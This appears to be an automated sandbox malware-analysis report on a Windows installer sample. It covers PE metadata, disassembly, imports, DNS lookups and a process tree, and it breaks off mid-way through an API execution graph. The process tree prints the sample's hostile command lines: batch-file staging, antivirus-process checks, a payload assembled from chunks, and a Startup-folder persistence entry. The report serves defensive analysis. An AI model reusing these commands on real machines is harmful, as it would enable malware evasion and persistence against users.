                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x4F47E2DA [Fri Feb 24 19:19:54 2012 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:5
                                                    OS Version Minor:0
                                                    File Version Major:5
                                                    File Version Minor:0
                                                    Subsystem Version Major:5
                                                    Subsystem Version Minor:0
                                                    Import Hash:be41bf7b8cc010b614bd36bbca606973
                                                    Signature Valid:
                                                    Signature Issuer:
                                                    Signature Validation Error:
                                                    Error Number:
                                                    Not Before, Not After
                                                      Subject Chain
                                                        Version:
                                                        Thumbprint MD5:
                                                        Thumbprint SHA-1:
                                                        Thumbprint SHA-256:
                                                        Serial:
                                                        Instruction
                                                        sub esp, 000002D4h
                                                        push ebx
                                                        push ebp
                                                        push esi
                                                        push edi
                                                        push 00000020h
                                                        xor ebp, ebp
                                                        pop esi
                                                        mov dword ptr [esp+18h], ebp
                                                        mov dword ptr [esp+10h], 00409268h
                                                        mov dword ptr [esp+14h], ebp
                                                        call dword ptr [00408030h]
                                                        push 00008001h
                                                        call dword ptr [004080B4h]
                                                        push ebp
                                                        call dword ptr [004082C0h]
                                                        push 00000008h
                                                        mov dword ptr [00472EB8h], eax
                                                        call 00007FC43CFBC70Bh
                                                        push ebp
                                                        push 000002B4h
                                                        mov dword ptr [00472DD0h], eax
                                                        lea eax, dword ptr [esp+38h]
                                                        push eax
                                                        push ebp
                                                        push 00409264h
                                                        call dword ptr [00408184h]
                                                        push 0040924Ch
                                                        push 0046ADC0h
                                                        call 00007FC43CFBC3EDh
                                                        call dword ptr [004080B0h]
                                                        push eax
                                                        mov edi, 004C30A0h
                                                        push edi
                                                        call 00007FC43CFBC3DBh
                                                        push ebp
                                                        call dword ptr [00408134h]
                                                        cmp word ptr [004C30A0h], 0022h
                                                        mov dword ptr [00472DD8h], eax
                                                        mov eax, edi
                                                        jne 00007FC43CFB9CDAh
                                                        push 00000022h
                                                        pop esi
                                                        mov eax, 004C30A2h
                                                        push esi
                                                        push eax
                                                        call 00007FC43CFBC0B1h
                                                        push eax
                                                        call dword ptr [00408260h]
                                                        mov esi, eax
                                                        mov dword ptr [esp+1Ch], esi
                                                        jmp 00007FC43CFB9D63h
                                                        push 00000020h
                                                        pop ebx
                                                        cmp ax, bx
                                                        jne 00007FC43CFB9CDAh
                                                        add esi, 02h
                                                        cmp word ptr [esi], bx
                                                        Programming Language:
                                                        • [ C ] VS2008 SP1 build 30729
                                                        • [IMP] VS2008 SP1 build 30729
                                                        • [ C ] VS2010 SP1 build 40219
                                                        • [RES] VS2010 SP1 build 40219
                                                        • [LNK] VS2010 SP1 build 40219
                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x9b340xb4.rdata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xf40000x2f3a.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x191be70x2868
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x7a0000x964.ndata
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x80000x2d0.rdata
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x10000x6dae0x6e0000499a6f70259150109c809d6aa0e6edFalse0.6611150568181818data6.508529563136936IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rdata0x80000x2a620x2c0007990aaa54c3bc638bb87a87f3fb13e3False0.3526278409090909data4.390535020989255IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .data0xb0000x67ebc0x200014871d9a00f0e0c8c2a7cd25606c453False0.203125data1.4308602597540492IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .ndata0x730000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .rsrc0xf40000x2f3a0x3000c15fab2d5ae919ed0bc47dbc7b92bcf1False0.5292154947916666data5.37146345911248IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc0xf70000xf320x1000c37dbd85adbacba5815fd64300b19e35False0.5908203125data5.4190090723243225IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                        RT_ICON0xf41d80x2668Device independent bitmap graphic, 48 x 96 x 32, image size 9792EnglishUnited States0.5450569568755086
                                                        RT_DIALOG0xf68400x100dataEnglishUnited States0.5234375
                                                        RT_DIALOG0xf69400x11cdataEnglishUnited States0.6056338028169014
                                                        RT_DIALOG0xf6a5c0x60dataEnglishUnited States0.7291666666666666
                                                        RT_GROUP_ICON0xf6abc0x14dataEnglishUnited States1.1
                                                        RT_VERSION0xf6ad00x194OpenPGP Secret KeyEnglishUnited States0.5693069306930693
                                                        RT_MANIFEST0xf6c640x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193
                                                        DLLImport
                                                        KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                        USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                        GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                        SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                        ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                        COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                        ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                        VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                                                        Language of compilation systemCountry where language is spokenMap
                                                        EnglishUnited States
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Dec 18, 2024 14:42:52.571007013 CET4935753192.168.2.101.1.1.1
                                                        Dec 18, 2024 14:42:52.805532932 CET53493571.1.1.1192.168.2.10
                                                        Dec 18, 2024 14:43:08.505074024 CET6175753192.168.2.101.1.1.1
                                                        Dec 18, 2024 14:43:08.644860983 CET53617571.1.1.1192.168.2.10
                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Dec 18, 2024 14:42:52.571007013 CET192.168.2.101.1.1.10xb36aStandard query (0)zaZEComvggHsSEuOVnvSMAnVIZblq.zaZEComvggHsSEuOVnvSMAnVIZblqA (IP address)IN (0x0001)false
                                                        Dec 18, 2024 14:43:08.505074024 CET192.168.2.101.1.1.10x36d7Standard query (0)zaZEComvggHsSEuOVnvSMAnVIZblq.zaZEComvggHsSEuOVnvSMAnVIZblqA (IP address)IN (0x0001)false
                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Dec 18, 2024 14:42:43.776007891 CET1.1.1.1192.168.2.100x258No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                        Dec 18, 2024 14:42:43.776007891 CET1.1.1.1192.168.2.100x258No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                        Dec 18, 2024 14:42:52.805532932 CET1.1.1.1192.168.2.100xb36aName error (3)zaZEComvggHsSEuOVnvSMAnVIZblq.zaZEComvggHsSEuOVnvSMAnVIZblqnonenoneA (IP address)IN (0x0001)false
                                                        Dec 18, 2024 14:43:08.644860983 CET1.1.1.1192.168.2.100x36d7Name error (3)zaZEComvggHsSEuOVnvSMAnVIZblq.zaZEComvggHsSEuOVnvSMAnVIZblqnonenoneA (IP address)IN (0x0001)false

                                                        Click to jump to process

                                                        Click to jump to process

                                                        Click to dive into process behavior distribution

                                                        Click to jump to process

                                                        Target ID:0
                                                        Start time:08:42:44
                                                        Start date:18/12/2024
                                                        Path:C:\Users\user\Desktop\ldqj18tn.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\ldqj18tn.exe"
                                                        Imagebase:0x400000
                                                        File size:1'656'911 bytes
                                                        MD5 hash:574AB8397D011243CB52BEF069BAD2DC
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:2
                                                        Start time:08:42:47
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\System32\cmd.exe" /c copy Descending Descending.bat & Descending.bat
                                                        Imagebase:0xd70000
                                                        File size:236'544 bytes
                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:3
                                                        Start time:08:42:47
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff620390000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:4
                                                        Start time:08:42:48
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:tasklist
                                                        Imagebase:0x7b0000
                                                        File size:79'360 bytes
                                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:5
                                                        Start time:08:42:48
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\SysWOW64\findstr.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:findstr /I "wrsa opssvc"
                                                        Imagebase:0x8b0000
                                                        File size:29'696 bytes
                                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:6
                                                        Start time:08:42:48
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:tasklist
                                                        Imagebase:0x7b0000
                                                        File size:79'360 bytes
                                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:7
                                                        Start time:08:42:48
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\SysWOW64\findstr.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
                                                        Imagebase:0x8b0000
                                                        File size:29'696 bytes
                                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:8
                                                        Start time:08:42:49
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:cmd /c md 704579
                                                        Imagebase:0xd70000
                                                        File size:236'544 bytes
                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:9
                                                        Start time:08:42:49
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\SysWOW64\findstr.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:findstr /V "MARTNMSPIDERRINGTONE" Mh
                                                        Imagebase:0x8b0000
                                                        File size:29'696 bytes
                                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:10
                                                        Start time:08:42:49
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:cmd /c copy /b ..\Consequence + ..\Gently + ..\Situations + ..\International + ..\Jet + ..\Commodities + ..\Mood + ..\Fastest + ..\Estimate + ..\Jessica + ..\Prof + ..\Becoming + ..\Princess + ..\Required + ..\Traveller + ..\Against u
                                                        Imagebase:0xd70000
                                                        File size:236'544 bytes
                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:11
                                                        Start time:08:42:49
                                                        Start date:18/12/2024
                                                        Path:C:\Users\user\AppData\Local\Temp\704579\Organizational.pif
                                                        Wow64 process (32bit):true
                                                        Commandline:Organizational.pif u
                                                        Imagebase:0x250000
                                                        File size:893'608 bytes
                                                        MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Antivirus matches:
                                                        • Detection: 8%, ReversingLabs
                                                        Reputation:moderate
                                                        Has exited:false

                                                        Target ID:12
                                                        Start time:08:42:50
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\SysWOW64\choice.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:choice /d y /t 5
                                                        Imagebase:0x1f0000
                                                        File size:28'160 bytes
                                                        MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:13
                                                        Start time:08:42:51
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoMesh.url" & echo URL="C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoMesh.url" & exit
                                                        Imagebase:0xd70000
                                                        File size:236'544 bytes
                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:14
                                                        Start time:08:42:51
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff620390000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:16
                                                        Start time:08:43:03
                                                        Start date:18/12/2024
                                                        Path:C:\Windows\System32\wscript.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js"
                                                        Imagebase:0x7ff7a0a30000
                                                        File size:170'496 bytes
                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:17
                                                        Start time:08:43:03
                                                        Start date:18/12/2024
                                                        Path:C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr" "C:\Users\user\AppData\Local\TechMesh Dynamics\M"
                                                        Imagebase:0x1f0000
                                                        File size:893'608 bytes
                                                        MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Antivirus matches:
                                                        • Detection: 8%, ReversingLabs
                                                        Has exited:false

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:18.2%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:21.4%
                                                          Total number of Nodes:1474
                                                          Total number of Limit Nodes:32
                                                          execution_graph 4269 402fc0 4270 401446 18 API calls 4269->4270 4271 402fc7 4270->4271 4272 403017 4271->4272 4273 40300a 4271->4273 4276 401a13 4271->4276 4274 406805 18 API calls 4272->4274 4275 401446 18 API calls 4273->4275 4274->4276 4275->4276 4277 4023c1 4278 40145c 18 API calls 4277->4278 4279 4023c8 4278->4279 4282 40726a 4279->4282 4285 406ed2 CreateFileW 4282->4285 4286 406f04 4285->4286 4287 406f1e ReadFile 4285->4287 4288 4062a3 11 API calls 4286->4288 4289 4023d6 4287->4289 4292 406f84 4287->4292 4288->4289 4290 4071e3 CloseHandle 4290->4289 4291 406f9b ReadFile lstrcpynA lstrcmpA 4291->4292 4293 406fe2 SetFilePointer ReadFile 4291->4293 4292->4289 4292->4290 4292->4291 4296 406fdd 4292->4296 4293->4290 4294 4070a8 ReadFile 4293->4294 4295 407138 4294->4295 4295->4294 4295->4296 4297 40715f SetFilePointer GlobalAlloc ReadFile 4295->4297 4296->4290 4298 4071a3 4297->4298 4299 4071bf lstrcpynW GlobalFree 4297->4299 4298->4298 4298->4299 4299->4290 4300 401cc3 4301 40145c 18 API calls 4300->4301 4302 401cca lstrlenW 4301->4302 4303 4030dc 4302->4303 4304 4030e3 4303->4304 4306 405f51 wsprintfW 4303->4306 4306->4304 4321 401c46 4322 40145c 18 API calls 4321->4322 4323 401c4c 4322->4323 4324 4062a3 11 API calls 4323->4324 4325 401c59 4324->4325 4326 406c9b 81 API calls 4325->4326 4327 401c64 4326->4327 4328 4030c7 InvalidateRect 4329 4030e3 4328->4329 4330 403049 4331 401446 18 API calls 4330->4331 4334 403050 4331->4334 4332 406805 18 API calls 4333 401a13 4332->4333 4334->4332 4334->4333 4335 40204a 4336 401446 18 API calls 4335->4336 4337 402051 IsWindow 4336->4337 4338 4018d3 4337->4338 4339 40324c 4340 403277 4339->4340 4341 40325e SetTimer 4339->4341 4342 4032cc 4340->4342 4343 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4340->4343 4341->4340 4343->4342 4344 4048cc 4345 4048f1 4344->4345 4346 4048da 4344->4346 4348 4048ff IsWindowVisible 4345->4348 4349 404916 4345->4349 4347 4048e0 4346->4347 4362 40495a 4346->4362 4350 403daf SendMessageW 4347->4350 4352 40490c 4348->4352 4348->4362 4351 404960 CallWindowProcW 4349->4351 4368 406009 lstrcpynW 4349->4368 4353 4048ea 4350->4353 4351->4353 4363 40484e SendMessageW 4352->4363 4356 404945 4369 405f51 wsprintfW 4356->4369 4358 40494c 4359 40141d 80 API calls 4358->4359 4360 404953 4359->4360 4370 406009 lstrcpynW 4360->4370 4362->4351 4364 404871 GetMessagePos ScreenToClient SendMessageW 4363->4364 4365 4048ab SendMessageW 4363->4365 4366 4048a3 4364->4366 4367 4048a8 4364->4367 4365->4366 4366->4349 4367->4365 4368->4356 4369->4358 4370->4362 4371 4022cc 4372 40145c 18 API calls 4371->4372 4373 4022d3 4372->4373 4374 4062d5 2 API calls 4373->4374 4375 4022d9 4374->4375 4376 4022e8 4375->4376 4380 405f51 wsprintfW 4375->4380 4379 4030e3 4376->4379 4381 405f51 wsprintfW 4376->4381 4380->4376 4381->4379 4149 4050cd 4150 405295 4149->4150 4151 4050ee GetDlgItem GetDlgItem GetDlgItem 4149->4151 4152 4052c6 4150->4152 4153 40529e GetDlgItem CreateThread CloseHandle 4150->4153 4198 403d98 SendMessageW 4151->4198 4155 4052f4 4152->4155 4157 4052e0 ShowWindow ShowWindow 4152->4157 4158 405316 4152->4158 4153->4152 4201 405047 83 API calls 4153->4201 4159 405352 4155->4159 4161 405305 4155->4161 4162 40532b ShowWindow 4155->4162 4156 405162 4169 406805 18 API calls 4156->4169 4200 403d98 SendMessageW 4157->4200 4163 403dca 8 API calls 4158->4163 4159->4158 4164 40535d SendMessageW 4159->4164 4165 403d18 SendMessageW 4161->4165 4167 40534b 4162->4167 4168 40533d 4162->4168 4166 40528e 4163->4166 4164->4166 4171 405376 CreatePopupMenu 4164->4171 4165->4158 4170 403d18 SendMessageW 4167->4170 4172 404f72 25 API calls 4168->4172 4173 405181 4169->4173 4170->4159 4175 406805 18 API calls 4171->4175 4172->4167 4174 4062a3 11 API calls 4173->4174 4176 40518c GetClientRect GetSystemMetrics SendMessageW SendMessageW 4174->4176 4177 405386 AppendMenuW 4175->4177 4178 4051f3 4176->4178 4179 4051d7 SendMessageW SendMessageW 4176->4179 4180 405399 GetWindowRect 4177->4180 4181 4053ac 4177->4181 4182 405206 4178->4182 4183 4051f8 SendMessageW 4178->4183 4179->4178 4184 4053b3 TrackPopupMenu 4180->4184 4181->4184 4185 403d3f 19 API calls 4182->4185 4183->4182 4184->4166 4186 4053d1 4184->4186 4187 405216 4185->4187 4188 4053ed SendMessageW 4186->4188 4189 405253 GetDlgItem SendMessageW 4187->4189 4190 40521f ShowWindow 4187->4190 4188->4188 4191 40540a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4188->4191 4189->4166 4194 405276 SendMessageW SendMessageW 4189->4194 4192 405242 4190->4192 4193 405235 ShowWindow 4190->4193 4195 40542f SendMessageW 4191->4195 4199 403d98 SendMessageW 4192->4199 4193->4192 4194->4166 4195->4195 4196 40545a GlobalUnlock SetClipboardData CloseClipboard 4195->4196 4196->4166 4198->4156 4199->4189 4200->4155 4382 4030cf 4383 40145c 18 API calls 4382->4383 4384 4030d6 4383->4384 4385 4030dc 4384->4385 4389 4063ac GlobalAlloc lstrlenW 4384->4389 4387 4030e3 4385->4387 4416 405f51 wsprintfW 4385->4416 4390 4063e2 4389->4390 4391 406434 4389->4391 4392 40640f GetVersionExW 4390->4392 4417 40602b CharUpperW 4390->4417 4391->4385 4392->4391 4393 40643e 4392->4393 4395 406464 LoadLibraryA 4393->4395 4396 40644d 4393->4396 4395->4391 4398 406482 GetProcAddress GetProcAddress GetProcAddress 4395->4398 4396->4391 4397 406585 GlobalFree 4396->4397 4399 40659b LoadLibraryA 4397->4399 4400 4066dd FreeLibrary 4397->4400 4404 4064aa 4398->4404 4407 4065f5 4398->4407 4399->4391 4402 4065b5 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4399->4402 4400->4391 4401 406651 FreeLibrary 4403 40662a 4401->4403 4402->4407 4406 4066ea 4403->4406 4413 406685 lstrcmpW 4403->4413 4414 4066b6 CloseHandle 4403->4414 4415 4066d4 CloseHandle 4403->4415 4405 4064ce FreeLibrary GlobalFree 4404->4405 4404->4407 4411 4064ea 4404->4411 4405->4391 4410 4066ef CloseHandle FreeLibrary 4406->4410 4407->4401 4407->4403 4408 4064fc lstrcpyW OpenProcess 4409 40654f CloseHandle CharUpperW lstrcmpW 4408->4409 4408->4411 4409->4407 4409->4411 4412 406704 CloseHandle 4410->4412 4411->4397 4411->4408 4411->4409 4412->4410 4413->4403 4413->4412 4414->4403 4415->4400 4416->4387 4417->4390 4418 407752 4422 407344 4418->4422 4419 407c6d 4420 4073c2 GlobalFree 4421 4073cb GlobalAlloc 4420->4421 4421->4419 4421->4422 4422->4419 4422->4420 4422->4421 4422->4422 4423 407443 GlobalAlloc 4422->4423 4424 40743a GlobalFree 4422->4424 4423->4419 4423->4422 4424->4423 4425 401dd3 4426 401446 18 API calls 4425->4426 4427 401dda 4426->4427 4428 401446 18 API calls 4427->4428 4429 4018d3 4428->4429 4430 4028d3 RegCreateKeyExW 4431 4028e8 4430->4431 4435 4029ef 4430->4435 4432 402934 4431->4432 4434 40145c 18 API calls 4431->4434 4433 402963 4432->4433 4436 401446 18 API calls 4432->4436 4437 4029ae RegSetValueExW 4433->4437 4442 40337f 37 API calls 4433->4442 4438 4028fc lstrlenW 4434->4438 4441 402947 4436->4441 4439 4029c6 RegCloseKey 4437->4439 4440 4029cb 4437->4440 4443 402918 4438->4443 4444 40292a 4438->4444 4439->4435 4446 4062a3 11 API calls 4440->4446 4447 4062a3 11 API calls 4441->4447 4448 40297b 4442->4448 4449 4062a3 11 API calls 4443->4449 4445 4062a3 11 API calls 4444->4445 4445->4432 4446->4439 4447->4433 4455 406224 4448->4455 4450 402922 4449->4450 4450->4437 4454 4062a3 11 API calls 4454->4450 4456 406247 4455->4456 4457 40628a 4456->4457 4458 40625c wsprintfW 4456->4458 4459 402991 4457->4459 4460 406293 lstrcatW 4457->4460 4458->4457 4458->4458 4459->4454 4460->4459 4461 4040d3 4462 4040dd 4461->4462 4463 40410e 4462->4463 4476 403fca WideCharToMultiByte 4462->4476 4465 403d3f 19 API calls 4463->4465 4466 40414e 4465->4466 4467 403d3f 19 API calls 4466->4467 4468 40415b CheckDlgButton 4467->4468 4479 403d85 KiUserCallbackDispatcher 4468->4479 4470 404179 GetDlgItem 4480 403d98 SendMessageW 4470->4480 4472 40418f SendMessageW 4473 4041b5 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4472->4473 4474 4041ac GetSysColor 4472->4474 4475 40435c 4473->4475 4474->4473 4477 404007 4476->4477 4478 403fe9 GlobalAlloc WideCharToMultiByte 4476->4478 4477->4463 4478->4477 4479->4470 4480->4472 4488 401cd5 4489 401446 18 API calls 4488->4489 4490 401cdd 4489->4490 4491 401446 18 API calls 4490->4491 4492 401ce8 4491->4492 4493 40145c 18 API calls 